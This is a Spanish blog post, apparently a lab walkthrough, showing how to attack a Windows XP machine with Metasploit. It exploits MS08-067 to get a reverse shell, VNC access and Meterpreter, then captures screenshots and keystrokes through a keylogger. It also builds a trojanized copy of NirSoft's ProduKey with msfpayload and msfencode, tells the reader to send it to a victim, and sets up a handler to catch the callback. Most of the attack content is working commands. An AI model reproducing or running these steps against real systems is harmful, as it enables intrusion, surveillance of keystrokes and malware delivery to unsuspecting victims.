miércoles, 12 de noviembre de 2014

Meterpreter

Lo hacemos con una máquina Kali, que la ponemos en adaptador puente, y cogemos otra máquina, en este caso un Windows XP el cual ponemos también en adaptador puente para que se encuentren ambas máquinas en la misma red, ya que si no, el ejercicio no podría realizarse.
Vamos a ver un ejemplo con ms08_067_netatapi

Entramos con msfconsole


Seleccionamos el exploit: use exploit/windows/smb/ms08_067_netatapi
Seleccionamos el PAYLOAD: set PAYLOAD windows/shell/reverse_tcp


Vemos las opciones que tenemos que configurar: show options


Configuramos las distintas opciones:
set RHOST 192.168.1.110
set LHOST 192.168.1.35


Lanzamos el exploit: exploit


Nos devuelve la shell del equipo de la víctima.
Otros PAYLOADS:
Para conectarse por VNC: windows/vncinject/reverse_tcp


Si lanzamos el exploit lo que se ve es la pantalla de la víctima.


Para salir, se hace pulsando control más C.
Meterpreter : windows/meterpreter/reverse_tcp


Si lanzamos el exploit.


Un ejemplo es el uso del capturador de pantalla.


Si queremos ver los procesos activos para cambiar de proceso lo hacemos con un ps.


Voy a cambiar al proceso del worpad para insertar un keylogger con el cual se capturan las entradas del teclado.

Para ello escribo en el worpad de la víctima.


Vemos que proceso es.


Y nos migramos a ese proceso.


Arrancamos el keylogger.


Para volcar los datos usamos dump.


Y se ve lo que se ha escrito en el documento.
Y para detenerlo se hace con keycan_stop.
Vamos ahora a crear un troyano
Se creará un Troyado utilizando Metasploit Framework, el cual permitirá incrustar un “Payload” o Carga útil dentro de la utilidad ProduKey de NirSoft, el cual muestra el ProductID de Windows, Microsoft Office, Exchange Server, y SQL Server instalado en la computadora donde se ejecuta.
Se procede a descargar y descomprimir el archivo ProducKey desde el sitio web de NirSoft.



Se utiliza la herramienta msfpayload incluida en Metasploit Framework para inyectar un Payload o Carga útil dentro del ejecutable ProduKey.exe.
En el comando msfpayload la opción LHOST define la dirección IP local, mientras que LPORT define el puerto local. Es decir la dirección IP y Puerto hacia el cual la victima realizará la conexión. Para el comando msfencode, la opción “-e” define el codificador a utilizar, la opción “-c” define el número de veces en que se codificarán los datos, la opción “-t” define el formato de salida, la opción “-x” especifica una plantilla ejecutable alterna, y la opción “-o” define el archivo de salida.
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -x ./ProduKey.exe -o /tmp/ProduKey.exe


El proceso se ha realizado correctamente y se ha generado un nuevo archivo con el mismo nombre, pero que incluye el "Payload" incrustado. Al realizar un listado de archivos, anotar el tamaño de cada uno de los archivos, tanto el archivo original como troyanizado "parecen" ser iguales.


Para identificar de manera sencilla la diferencia entre estos dos archivos se genera el hash SHA-1 de cada uno de ellos.
# sha1sum /tmp/ProduKey.exe ProduKey.exe


El archivo troyanizado debe ser enviado a la víctima utilizando cualquier mecanismo conocido.



Dado que se ha definido un Payload Reverso de Meterpreter, se requiere configurar un manejador para la conexión originada desde la victima hacia la dirección IP asignada al sistema Kali Linux.
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.0.12
msf> set LPORT 443
msf> run















No hay comentarios:

Publicar un comentario